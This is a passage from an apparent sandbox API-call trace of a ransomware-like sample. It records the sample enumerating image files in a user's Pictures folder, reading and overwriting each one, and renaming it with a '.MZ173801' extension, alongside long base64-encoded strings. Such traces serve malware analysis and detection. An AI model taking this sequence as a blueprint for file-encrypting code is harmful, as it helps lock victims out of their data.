yN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0115.242] GetCurrentThreadId () returned 0x1358 [0115.242] GetCurrentThreadId () returned 0x1358 [0115.242] GetCurrentThreadId () returned 0x1358 [0115.242] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.242] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0115.242] GetCurrentThreadId () returned 0x1358 [0115.242] GetCurrentThreadId () returned 0x1358 [0115.242] GetCurrentThreadId () returned 0x1358 [0115.242] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\BDibx-.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\bdibx-.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.242] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0115.242] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.243] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x1426a [0115.243] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.243] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1426a, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x1426a, lpOverlapped=0x0) returned 1 [0115.244] CloseHandle (hObject=0x3d0) returned 1 [0115.245] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\BDibx-.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\bdibx-.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.247] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x1426a, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0x1426a, lpOverlapped=0x0) returned 1 [0115.249] CloseHandle (hObject=0x3d0) returned 1 [0115.251] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\BDibx-.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\bdibx-.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\BDibx-.png.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\bdibx-.png.mz173801")) returned 1 [0115.252] GetCurrentThreadId () returned 0x1358 [0115.252] GetCurrentThreadId () returned 0x1358 [0115.252] GetCurrentThreadId () returned 0x1358 [0115.252] GetCurrentThreadId () returned 0x1358 [0115.252] GetCurrentThreadId () returned 0x1358 [0115.252] GetCurrentThreadId () returned 0x1358 [0115.252] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8970a220, ftCreationTime.dwHighDateTime=0x1d5e3ba, ftLastAccessTime.dwLowDateTime=0x93b68ad0, ftLastAccessTime.dwHighDateTime=0x1d5e453, ftLastWriteTime.dwLowDateTime=0x93b68ad0, ftLastWriteTime.dwHighDateTime=0x1d5e453, nFileSizeHigh=0x0, nFileSizeLow=0x60f1, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="BXHxcreN0NZMlQbLh4Mv.jpg", cAlternateFileName="BXHXCR~1.JPG")) returned 1 [0115.252] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0115.252] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0115.252] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\BXHxcreN0NZMlQbLh4Mv.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\bxhxcren0nzmlqblh4mv.jpg"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8970a220, ftCreationTime.dwHighDateTime=0x1d5e3ba, ftLastAccessTime.dwLowDateTime=0x93b68ad0, ftLastAccessTime.dwHighDateTime=0x1d5e453, ftLastWriteTime.dwLowDateTime=0x93b68ad0, ftLastWriteTime.dwHighDateTime=0x1d5e453, nFileSizeHigh=0x0, nFileSizeLow=0x60f1)) returned 1 [0115.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0115.253] GetCurrentThreadId () returned 0x1358 [0115.253] GetCurrentThreadId () returned 0x1358 [0115.253] GetCurrentThreadId () returned 0x1358 [0115.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0115.254] GetCurrentThreadId () returned 0x1358 [0115.254] GetCurrentThreadId () returned 0x1358 [0115.254] GetCurrentThreadId () returned 0x1358 [0115.254] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\BXHxcreN0NZMlQbLh4Mv.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\bxhxcren0nzmlqblh4mv.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.254] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0115.254] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.254] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x60f1 [0115.254] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.254] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x60f1, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x60f1, lpOverlapped=0x0) returned 1 [0115.255] CloseHandle (hObject=0x3d0) returned 1 [0115.255] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\BXHxcreN0NZMlQbLh4Mv.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\bxhxcren0nzmlqblh4mv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.256] WriteFile (in: hFile=0x3d0, lpBuffer=0x2439b60*, nNumberOfBytesToWrite=0x60f1, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2439b60*, lpNumberOfBytesWritten=0x19f6f0*=0x60f1, lpOverlapped=0x0) returned 1 [0115.258] CloseHandle (hObject=0x3d0) returned 1 [0115.259] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\BXHxcreN0NZMlQbLh4Mv.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\bxhxcren0nzmlqblh4mv.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\BXHxcreN0NZMlQbLh4Mv.jpg.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\bxhxcren0nzmlqblh4mv.jpg.mz173801")) returned 1 [0115.259] GetCurrentThreadId () returned 0x1358 [0115.260] GetCurrentThreadId () returned 0x1358 [0115.260] GetCurrentThreadId () returned 0x1358 [0115.260] GetCurrentThreadId () returned 0x1358 [0115.260] GetCurrentThreadId () returned 0x1358 [0115.260] GetCurrentThreadId () returned 0x1358 [0115.260] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e75740, ftCreationTime.dwHighDateTime=0x1d5ebda, ftLastAccessTime.dwLowDateTime=0x2db4ab90, ftLastAccessTime.dwHighDateTime=0x1d5e68d, ftLastWriteTime.dwLowDateTime=0x2db4ab90, ftLastWriteTime.dwHighDateTime=0x1d5e68d, nFileSizeHigh=0x0, nFileSizeLow=0x13b36, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="cPoUOQ7FRc3tfk.gif", cAlternateFileName="CPOUOQ~1.GIF")) returned 1 [0115.260] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0115.260] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0115.260] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\cPoUOQ7FRc3tfk.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\cpouoq7frc3tfk.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e75740, ftCreationTime.dwHighDateTime=0x1d5ebda, ftLastAccessTime.dwLowDateTime=0x2db4ab90, ftLastAccessTime.dwHighDateTime=0x1d5e68d, ftLastWriteTime.dwLowDateTime=0x2db4ab90, ftLastWriteTime.dwHighDateTime=0x1d5e68d, nFileSizeHigh=0x0, nFileSizeLow=0x13b36)) returned 1 [0115.260] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.260] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 